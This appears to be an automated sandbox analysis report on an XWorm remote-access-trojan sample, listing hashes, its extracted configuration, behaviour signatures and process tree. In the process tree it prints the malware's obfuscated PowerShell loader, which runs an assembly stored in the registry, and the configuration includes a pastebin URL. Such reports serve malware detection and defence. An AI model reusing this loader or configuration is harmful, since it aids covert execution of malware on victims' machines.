Overview

overview

10

Static

static

3

GBFJ2_DeadPayload.exe

windows7-x64

10

GBFJ2_DeadPayload.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    31/10/2024, 09:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    GBFJ2_DeadPayload.exe

  • Size

    500KB

  • MD5

    36656751a6f5235ee7733f649f2333f1

  • SHA1

    ce686bf0173d8fbc77bda352ec44021d1bc48630

  • SHA256

    fe2ab997f171c9095fd8bfa2f0355d12d336e4b98e3305836ae565d1a4667fb0

  • SHA512

    fb84cc76183a1a89017c1f33a95c0f8e040a422549f85b29a171373a909e3e8b9cbecfa428eeab42a6c816f77e522f168f2428622b2a35bc2e1324cd9e535b88

  • SSDEEP

    12288:U3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sdzO:OkGTy

Score
10/10
xwormdiscoveryevasionexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

QgVg78qW15uIsQ4H

Attributes
  • Install_directory

    %Public%

  • install_file

    ohh.exe

  • pastebin_url

    https://pastebin.com/raw/J09JweeH

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{887a5d70-df16-47be-8a22-0993d9eb9c1f}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2792
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:476
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:596
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1080
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe
                3⤵
                  PID:1616
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS
                2⤵
                  PID:672
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                  2⤵
                  • Modifies security service
                  PID:760
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                  2⤵
                    PID:808
                    • C:\Windows\system32\Dwm.exe
                      "C:\Windows\system32\Dwm.exe"
                      3⤵
                        PID:1172
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:836
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {F6F04963-8848-4DF3-ABE3-441A8967E354} S-1-5-18:NT AUTHORITY\System:Service:
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2680
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](68)+'e'+[Char](97)+''+[Char](100)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2800
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService
                      2⤵
                        PID:972
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService
                        2⤵
                          PID:268
                        • C:\Windows\System32\spoolsv.exe
                          C:\Windows\System32\spoolsv.exe
                          2⤵
                            PID:108
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                            2⤵
                              PID:688
                            • C:\Windows\system32\taskhost.exe
                              "taskhost.exe"
                              2⤵
                                PID:1108
                              • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                2⤵
                                  PID:624
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                  2⤵
                                    PID:1844
                                  • C:\Windows\system32\sppsvc.exe
                                    C:\Windows\system32\sppsvc.exe
                                    2⤵
                                      PID:2744
                                  • C:\Windows\system32\lsass.exe
                                    C:\Windows\system32\lsass.exe
                                    1⤵
                                      PID:492
                                    • C:\Windows\system32\lsm.exe
                                      C:\Windows\system32\lsm.exe
                                      1⤵
                                        PID:500
                                      • C:\Windows\Explorer.EXE
                                        C:\Windows\Explorer.EXE
                                        1⤵
                                          PID:1228
                                          • C:\Users\Admin\AppData\Local\Temp\GBFJ2_DeadPayload.exe
                                            "C:\Users\Admin\AppData\Local\Temp\GBFJ2_DeadPayload.exe"
                                            2⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2360
                                            • C:\Users\Public\DeadMan.exe
                                              "C:\Users\Public\DeadMan.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2916
                                            • C:\Users\Public\DeadRoot.exe
                                              "C:\Users\Public\DeadRoot.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:2928

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Public\DeadMan.exe
                                          Filesize

                                          34KB

                                          MD5

                                          86596f8f255ec89d279b0824435e99ad

                                          SHA1

                                          828d881cd4e693004ef8285aec99ef741b7f12ea

                                          SHA256

                                          be04723ba31eb34aafe705d2ae69a8b76cd717f3d378c49eee960a86112b7a58

                                          SHA512

                                          ed8429cf751326a5b646e35c59c61b2b3a0fdd7179f6a9a33e0bc70526dd96a72e02c2456d480cb26a8c0cd5f641842a73073bd2dc246d038d3642cec14f4672

                                          Download Submit

                                        • C:\Users\Public\DeadRoot.exe
                                          Filesize

                                          151KB

                                          MD5

                                          b8479a23c22cf6fc456e197939284069

                                          SHA1

                                          b2d98cc291f16192a46f363d007e012d45c63300

                                          SHA256

                                          18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f

                                          SHA512

                                          786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4

                                          Download Submit

                                        • memory/432-42-0x0000000037C40000-0x0000000037C50000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/432-41-0x000007FEBFE60000-0x000007FEBFE70000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/432-40-0x0000000000220000-0x0000000000247000-memory.dmp

                                          Filesize

                                          156KB

                                          Download

                                        • memory/432-33-0x0000000000220000-0x0000000000247000-memory.dmp

                                          Filesize

                                          156KB

                                          Download

                                        • memory/432-34-0x0000000000220000-0x0000000000247000-memory.dmp

                                          Filesize

                                          156KB

                                          Download

                                        • memory/432-30-0x00000000001F0000-0x0000000000212000-memory.dmp

                                          Filesize

                                          136KB

                                          Download

                                        • memory/432-32-0x00000000001F0000-0x0000000000212000-memory.dmp

                                          Filesize

                                          136KB

                                          Download

                                        • memory/476-48-0x0000000000240000-0x0000000000267000-memory.dmp

                                          Filesize

                                          156KB

                                          Download

                                        • memory/476-54-0x0000000000240000-0x0000000000267000-memory.dmp

                                          Filesize

                                          156KB

                                          Download

                                        • memory/476-55-0x000007FEBFE60000-0x000007FEBFE70000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/476-56-0x0000000037C40000-0x0000000037C50000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/492-68-0x0000000000A10000-0x0000000000A37000-memory.dmp

                                          Filesize

                                          156KB

                                          Download

                                        • memory/492-69-0x000007FEBFE60000-0x000007FEBFE70000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/492-62-0x0000000000A10000-0x0000000000A37000-memory.dmp

                                          Filesize

                                          156KB

                                          Download

                                        • memory/492-70-0x0000000037C40000-0x0000000037C50000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/500-76-0x00000000002D0000-0x00000000002F7000-memory.dmp

                                          Filesize

                                          156KB

                                          Download

                                        • memory/2360-0-0x000007FEF5D03000-0x000007FEF5D04000-memory.dmp

                                          Filesize

                                          4KB

                                          Download

                                        • memory/2360-1-0x00000000012A0000-0x0000000001324000-memory.dmp

                                          Filesize

                                          528KB

                                          Download

                                        • memory/2792-20-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2792-26-0x0000000077AE0000-0x0000000077BFF000-memory.dmp

                                          Filesize

                                          1.1MB

                                          Download

                                        • memory/2792-27-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2792-22-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2792-19-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2792-21-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2792-25-0x0000000077C00000-0x0000000077DA9000-memory.dmp

                                          Filesize

                                          1.7MB

                                          Download

                                        • memory/2792-24-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2800-16-0x00000000016B0000-0x00000000016D8000-memory.dmp

                                          Filesize

                                          160KB

                                          Download

                                        • memory/2800-15-0x0000000000980000-0x0000000000988000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2800-14-0x0000000019FC0000-0x000000001A2A2000-memory.dmp

                                          Filesize

                                          2.9MB

                                          Download

                                        • memory/2800-18-0x0000000077AE0000-0x0000000077BFF000-memory.dmp

                                          Filesize

                                          1.1MB

                                          Download

                                        • memory/2800-17-0x0000000077C00000-0x0000000077DA9000-memory.dmp

                                          Filesize

                                          1.7MB

                                          Download

                                        • memory/2916-9-0x000007FEF5D00000-0x000007FEF66EC000-memory.dmp

                                          Filesize

                                          9.9MB

                                          Download

                                        • memory/2916-8-0x0000000000DF0000-0x0000000000DFE000-memory.dmp

                                          Filesize

                                          56KB

                                          Download

                                        • memory/2916-162-0x000007FEF5D00000-0x000007FEF66EC000-memory.dmp

                                          Filesize

                                          9.9MB

                                          Download